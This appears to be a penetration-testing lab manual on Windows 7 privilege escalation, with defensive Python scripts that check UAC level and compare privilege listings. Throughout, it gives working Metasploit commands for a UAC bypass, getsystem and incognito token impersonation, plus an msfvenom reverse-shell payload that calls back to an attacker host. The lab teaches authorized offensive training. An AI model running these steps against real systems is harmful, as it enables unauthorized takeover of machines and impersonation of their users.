© 2018 Caendra, Inc. - Hera For PTP - Privilege Escalation

In this lab, you can practice different privilege escalation techniques. It is important to
know that the remote system has already been compromised and a backdoor has been
installed on it. This means that you already have an exploit to get a Meterpreter session on
the target remote machine.

The lab diagram is the following:

Your machine is directly connected to the remote target network.


• Learn different techniques to escalate privileges

• Privilege escalation through Metasploit modules


• Use privilege escalation exploits manually

To guide you during the lab, you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of different tools plus
different methods to achieve the same goal. They are not meant to be used as a
methodology.

Armed with the skills acquired through the tasks, you can achieve the Lab goal.

If this is the first time you are doing this lab, we advise you to follow these Tasks.

Once you have completed all the Tasks, you can proceed to the end of this document and
check the solutions.

• Metasploit

Labs machines are not connected to the Internet.


Since the lab is mainly focused on privilege escalation, we assume we already have access
to the target machine.

The machine we want to test runs Windows 7. We have already exploited the machine and
we have already installed a backdoor. You can connect to the backdoor with the following
Metasploit settings:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4450
LPORT => 4450
msf exploit(handler) > set RHOST 172.50.50.20
RHOST => 172.16.50.20

This will give us a new meterpreter session on the machine.

Now that we have a session on the machine, we have to verify which privileges we have.
Get as much information about the machine and the session obtained as you can.


In the previous task, you should have gathered some useful information about our session
and the remote machine. For example, we know that:

• we are running under an administrator user,
• the User Account Control is enabled,
• the machine is Windows 7 x64.

With this information, try to escalate your privileges to SYSTEM.

In the previous task, you should have been able to bypass UAC and get SYSTEM privileges on
the machine. Try to manually bypass the UAC protection by using the exploit located in:

/usr/share/metasploit-framework/data/post/bypassuac-x64.exe

Instead of dumping and cracking Windows password hashes, use the incognito module
to get credentials and tokens that may be useful to change your session privileges.

Let us configure the handler to get a session on the remote machine 172.50.50.20:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4450
LPORT => 4450
msf exploit(handler) > set RHOST 172.50.50.20
RHOST => 172.16.50.20

This will give us a new meterpreter session on the machine.

msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 172.50.50.20
[*] Meterpreter session 1 opened (172.50.50.50:32908 -> 172.50.50.20:4450) at 2016-05-16 18:34:57 +0200

meterpreter >


Now that we have a working session on the remote machine, we have to get as much
information as we can.

First, let us obtain the Operating System of the remote machine. To do this, let us run the
module sysinfo:

meterpreter > sysinfo
Computer : ELS-WIN7
OS : Windows 7 (Build 7600).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

Now we know the machine is running Windows 7 (64 bit). Note that if we want to get more
information from the machine, we can run different modules such as winenum.

meterpreter > run winenum
[*] Running Windows Local Enumeration Meterpreter Script
[*] New session on 172.50.50.20:4450...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/ELS-WIN7_20160516.4331/ELS-WIN7_20160516.4331.txt
[*] Output of each individual command is saved to /root/.msf4/logs/scripts/winenum/ELS-WIN7_20160516.4331
[*] Checking if ELS-WIN7 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] UAC is Enabled
[*] Running Command List ...
[*] running command netstat -vb

[*] Running WMIC Commands ....
[*] running command wmic netclient list brief

[*] Extracting software list from registry
[-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!


The module stores a lot of useful information about the machine, which can be found in
your local .msf directory. For example, we can see that we are in the Administrator
group:

root@kali:~/.msf4/logs/scripts/winenum/ELS-WIN7_20160516.4331# ls net_*
net_accounts.txt              net_localgroup_administrators.txt  net_share.txt         net_view.txt
net_group_administrators.txt  net_localgroup.txt                 net_user.txt
net_group.txt                 net_session.txt                    net_view__domain.txt

root@kali:~/.msf4/logs/scripts/winenum/ELS-WIN7_20160516.4331# cat net_localgroup_administrators.txt
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
eLS
The command completed successfully.

Very useful information can also be obtained by running the module win_privs which
shows all the privileges that we have plus some other information about the system.

meterpreter > run post/windows/gather/win_privs

Current User
============

Is Admin  Is System  UAC Enabled  Foreground ID  UID
--------  ---------  -----------  -------------  ---
False     False      True         1              "eLS-Win7\\eLS"

Windows Privileges
==================

Name
----
SeChangeNotifyPrivilege
SeShutdownPrivilege
SeUndockPrivilege


From the previous screenshot, we can see that UAC is enabled. This means that our first
goal is to bypass it and then escalate Windows privileges. If we try to run getsystem at
this point, it fails:

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)


Now that we know more information about the exploited machine and our session, let us
see how to get SYSTEM privileges on it. We know that UAC is enabled so our first step is to
bypass this security mechanism.

To do so, we can use the module exploit/windows/local/bypassuac as follows (we
just need to set the session number and configure the payload information):

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set SESSION 1
SESSION => 1
msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(bypassuac) > set LHOST 172.50.50.50
LHOST => 172.50.50.50

Now that it has been configured, let us run the module with exploit and see what
happens:

msf exploit(bypassuac) > exploit

[*] Started reverse TCP handler on 172.50.50.50:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (957999 bytes) to 172.50.50.20
[*] Meterpreter session 2 opened (172.50.50.50:4444 -> 172.50.50.20:49158) at 2016-05-17 10:52:21 +0200

meterpreter >

As we can see, the exploit successfully bypassed the UAC restrictions. If we run the win_privs
post module again (in the new Meterpreter session), the output is different: we have more
privileges and the column Is Admin is now set to True.
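The bypassuac output above reports "UAC is set to Default" before continuing. As an added example (not part of the lab and not Metasploit's own code), the following Python script maps the three registry values that define the UAC slider position, under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, to that level and says whether the host is at a setting where signed Microsoft binaries elevate without a prompt, which is the behaviour bypassuac-style tools depend on. The function names are this example's own and the SAMPLE_HOSTS values are constructed; the value-to-slider mapping is Microsoft's documented one.

```python
"""Classify a Windows host's UAC configuration and say whether it is the
'Default' level that the lab's bypassuac output reports as bypassable.
Added example, not part of the lab or of Metasploit: the registry-value to
slider-position mapping is Microsoft's documented one; SAMPLE_HOSTS is constructed."""

POLICY_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"  # under HKLM
VALUE_NAMES = ("EnableLUA", "ConsentPromptBehaviorAdmin", "PromptOnSecureDesktop")


def uac_level(enable_lua, consent_admin, secure_desktop):
    """Map the three registry values to the UAC slider position."""
    if enable_lua == 0:
        # UAC fully off (Windows 7's 'Never notify' sets this and needs a reboot)
        return "Disabled"
    if consent_admin == 2 and secure_desktop == 1:
        return "Always Notify"
    if consent_admin == 5 and secure_desktop == 1:
        return "Default"                      # the level the lab host reports
    if consent_admin == 5 and secure_desktop == 0:
        return "Default (no secure desktop)"
    if consent_admin == 0:
        return "Never Notify"                 # Windows 8+ keeps EnableLUA=1 here
    return "Custom"


def assess(values):
    """Return the level and whether signed Microsoft binaries auto-elevate.

    Silent auto-elevation (ConsentPromptBehaviorAdmin 0 or 5, or UAC off) is the
    behaviour that bypassuac-style tools rely on; only a setting that prompts
    for every elevation removes it."""
    level = uac_level(*(values[n] for n in VALUE_NAMES))
    silent = values["EnableLUA"] == 0 or values["ConsentPromptBehaviorAdmin"] in (0, 5)
    if silent:
        advice = ("set ConsentPromptBehaviorAdmin=2 and PromptOnSecureDesktop=1 "
                  "(Always Notify) and keep daily-use accounts out of Administrators")
    else:
        advice = "prompting for every elevation; keep it that way"
    return {"level": level, "silent_elevation": silent, "advice": advice}


def read_live_values():
    """Read the three values from the live registry; Windows only."""
    import winreg  # stdlib on Windows, so imported lazily
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POLICY_KEY) as key:
        return {n: winreg.QueryValueEx(key, n)[0] for n in VALUE_NAMES}


# Constructed sample hosts; the first matches what the lab's bypassuac run reported.
SAMPLE_HOSTS = {
    "lab-like host": {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 5, "PromptOnSecureDesktop": 1},
    "hardened host": {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 2, "PromptOnSecureDesktop": 1},
    "uac disabled": {"EnableLUA": 0, "ConsentPromptBehaviorAdmin": 5, "PromptOnSecureDesktop": 1},
}

if __name__ == "__main__":
    for name, values in SAMPLE_HOSTS.items():
        result = assess(values)
        print(f"{name}: {result['level']}, silent elevation={result['silent_elevation']}; {result['advice']}")
```

On a Windows host, `assess(read_live_values())` gives the same verdict for the machine you are sitting on; the offline samples exist so the logic can be exercised anywhere. Note that UAC is a convenience boundary rather than a security boundary in Microsoft's own terms, so the durable fix is not running day-to-day work from an account in the Administrators group.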


meterpreter > run post/windows/gather/win_privs

Current User
============

Is Admin  Is System  UAC Enabled  Foreground ID  UID
--------  ---------  -----------  -------------  ---
True      False      True         1              "eLS-Win7\\eLS"

Windows Privileges
==================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreatePagefilePrivilege
SeDebugPrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeUndockPrivilege

Now that we have these new privileges, let us try to run getsystem again. As we can see,
this time it works and we get SYSTEM privileges.

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
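The two win_privs outputs are the clearest record of what the UAC bypass actually changed, and getsystem succeeding right afterwards is explained by the privileges in the second list. As an added example (not part of the lab and not Metasploit code), the following Python script parses both transcripts, reports which privileges the elevated session gained, and flags the ones that on their own amount to full control of the host. BEFORE and AFTER are the lab's own transcripts; the HIGH_VALUE table and the function names are this example's own.

```python
"""Diff the privileges reported by Metasploit's win_privs post module before and
after elevation, and flag the high-value ones. Added example, not part of the
lab: BEFORE/AFTER are the lab's two transcripts; HIGH_VALUE is this script's own
list of privileges Microsoft documents as equivalent to full control of a host."""
import re

BEFORE = r"""
Is Admin  Is System  UAC Enabled  Foreground ID  UID
--------  ---------  -----------  -------------  ---
False     False      True         1              "eLS-Win7\\eLS"

Windows Privileges
==================

Name
----
SeChangeNotifyPrivilege
SeShutdownPrivilege
SeUndockPrivilege
"""

AFTER = r"""
Is Admin  Is System  UAC Enabled  Foreground ID  UID
--------  ---------  -----------  -------------  ---
True      False      True         1              "eLS-Win7\\eLS"

Windows Privileges
==================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreatePagefilePrivilege
SeDebugPrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeUndockPrivilege
"""

# Privileges whose holder can read or change anything on the host.
HIGH_VALUE = {
    "SeDebugPrivilege": "read/write the memory of any process (e.g. LSASS)",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
    "SeImpersonatePrivilege": "impersonate client tokens (what getsystem uses)",
}

PRIV_RE = re.compile(r"^(Se\w+Privilege)\s*$", re.MULTILINE)


def parse_win_privs(text):
    """Return (flags, privileges) from a win_privs transcript."""
    lines = text.splitlines()
    # 'Current User' table: header row, dashed row, then a single data row
    row = next(i for i, l in enumerate(lines) if l.startswith("Is Admin")) + 2
    cells = lines[row].split()
    flags = {"is_admin": cells[0] == "True", "is_system": cells[1] == "True",
             "uac_enabled": cells[2] == "True"}
    return flags, set(PRIV_RE.findall(text))


def privilege_delta(before_text, after_text):
    """Compare two transcripts: gained, lost and high-value gained privileges."""
    before_flags, before_privs = parse_win_privs(before_text)
    after_flags, after_privs = parse_win_privs(after_text)
    gained = sorted(after_privs - before_privs)
    return {
        "before": before_flags,
        "after": after_flags,
        "gained": gained,
        "lost": sorted(before_privs - after_privs),
        "high_value_gained": {p: HIGH_VALUE[p] for p in gained if p in HIGH_VALUE},
    }


if __name__ == "__main__":
    delta = privilege_delta(BEFORE, AFTER)
    print(f"Is Admin: {delta['before']['is_admin']} -> {delta['after']['is_admin']}")
    print(f"{len(delta['gained'])} privileges gained, {len(delta['lost'])} lost")
    for name, why in delta["high_value_gained"].items():
        print(f"  [!] {name}: {why}")
```

Run on the lab's transcripts it reports fifteen gained privileges, five of them high-value (SeBackup, SeDebug, SeLoadDriver, SeRestore and SeTakeOwnership). From the defender's side the same comparison is worth running against any unexpected high-integrity process: an administrator account that did not go through a consent prompt but now holds SeDebugPrivilege is exactly the state the lab reached.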


We already know that bypassuac module works. It might be useful to understand how this
could be done manually. This means that we have to:

1. Create our own exploit
2. Upload it on the remote machine
3. Use the bypassuac exploit to run it

The first step is to create the payload (an .exe file in this case) that we will run by using
the bypassuac exploit. To do this we can use msfvenom as follows:

root@kali:~/LABS/14# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.50 LPORT=4700 -f exe --platform Windows > rTCP.exe
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes

The above command creates an .exe file that when executed, tries a connection back to
our machine at TCP port 4700.

Now we have to upload this file and the bypassuac exploit on the remote machine. In Kali
Linux, the bypassuac file is stored in the following folder:

/usr/share/metasploit-framework/data/post/

root@kali:~/LABS/14# locate bypassuac
/usr/share/metasploit-framework/data/post/bypassuac-x64.dll
/usr/share/metasploit-framework/data/post/bypassuac-x64.exe
/usr/share/metasploit-framework/data/post/bypassuac-x86.dll
/usr/share/metasploit-framework/data/post/bypassuac-x86.exe
/usr/share/metasploit-framework/modules/exploits/windows/local/bypassuac.rb
/usr/share/metasploit-framework/modules/exploits/windows/local/bypassuac_injection.rb
/usr/share/metasploit-framework/modules/exploits/windows/local/bypassuac_vbs.rb

We know that the machine is running Windows 7 64-bit, so we have to use the
bypassuac-x64.exe file.

So let us go back into the first Meterpreter session (the one with less privileges) and upload
these two files on the remote machine.


msf exploit(bypassuac) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > cd C:\\Users\\eLS\\Desktop
meterpreter > upload /usr/share/metasploit-framework/data/post/bypassuac-x64.exe bypassuac-x64.exe
[*] uploading : /usr/share/metasploit-framework/data/post/bypassuac-x64.exe -> bypassUAC64.exe
[*] uploaded : /usr/share/metasploit-framework/data/post/bypassuac-x64.exe -> bypassUAC64.exe
meterpreter > upload /root/LABS/14/rTCP.exe rTCP.exe
[*] uploading : rTCP.exe -> rTCP.exe
[*] uploaded : rTCP.exe -> rTCP.exe
meterpreter >

As we can see from the screenshot above, we uploaded the bypassuac exploit,
bypassuac-x64.exe, and the reverse TCP shell, rTCP.exe, in the Desktop folder of the
target machine.

Before trying to bypass the UAC, let us run bypassuac-x64.exe in order to understand
how to use it. If we run it (next screenshot), we can see that we can use different options.
For example, we can run commands allowed by cmd.exe, as well as specific executable
files.

The command (or the file) that is provided will be executed with elevated privileges.


Now that we know which options are required, we want to run our rTCP.exe file. Before
doing this, let us create the handler on our machine:

msf exploit(bypassuac) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.50.50.50
LHOST => 172.50.50.50
msf exploit(handler) > set LPORT 4700
LPORT => 4700
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.50.50.50:4700
[*] Starting the payload handler...

The handler must be configured with the same options set earlier (when we created the
rTCP.exe file).

Now that the handler is running, we can go back into our Meterpreter session, open a new
shell on the remote system and run the bypassuac exploit against our rTCP.exe payload.

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2744 created.
Channel 8 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\eLS\Desktop>bypassuac-x64.exe /c C:\Users\eLS\Desktop\rTCP.exe
bypassuac-x64.exe /c C:\Users\eLS\Desktop\rTCP.exe

As soon as we run the command, the handler receives the connection and, a few seconds
later, a new Meterpreter session is created.

[*] Sending stage (957999 bytes) to 172.50.50.20
[*] Meterpreter session 3 opened (172.50.50.50:4700 -> 172.50.50.20:49163) at 2016-05-17 11:46:00 +0200


This new session has elevated privileges, since rTCP.exe was started through the
bypassuac exploit and is therefore running as a high-integrity administrator process, so
if we try to run getsystem in it, it works.

First, exit the current shell channel with the CTRL-Z key combination, then background
the Meterpreter session and interact with the new Meterpreter session:

^Z
Background channel 49? [y/N] y
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: eLS-Win7\eLS
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >


We now have SYSTEM privileges on the machine and, as you already know, this allows us to
collect almost all the information stored on it. One of the most valuable pieces of
information we can obtain from a machine, and re-use to run further privilege escalation
attacks, is the user credentials.

Another very useful module is incognito. It allows us to impersonate user tokens. This
may be very useful during our privilege escalation phases because we will not need to
retrieve passwords; we can just impersonate users by stealing their tokens.

We can use incognito with the following command:

meterpreter > use incognito
Loading extension incognito...success.

Let us run help in order to get a list of available commands:

meterpreter > help incognito

Incognito Commands
==================

Command              Description
-------              -----------
add_group_user       Attempt to add a user to a global group with all tokens
add_localgroup_user  Attempt to add a user to a local group with all tokens
add_user             Attempt to add a user with all tokens
impersonate_token    Impersonate specified token
list_tokens          List tokens available under current user context
snarf_hashes         Snarf challenge/response hashes for every token

Let us now try to get a list of available tokens and then impersonate a different user. As we
can see in the following screenshot, this can be done by using the commands:

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
eLS-Win7\eLS
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

and then impersonate_token:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token eLS-Win7\\eLS
[+] Delegation token available
[+] Successfully impersonated user eLS-Win7\eLS
meterpreter > getuid
Server username: eLS-Win7\eLS
meterpreter >
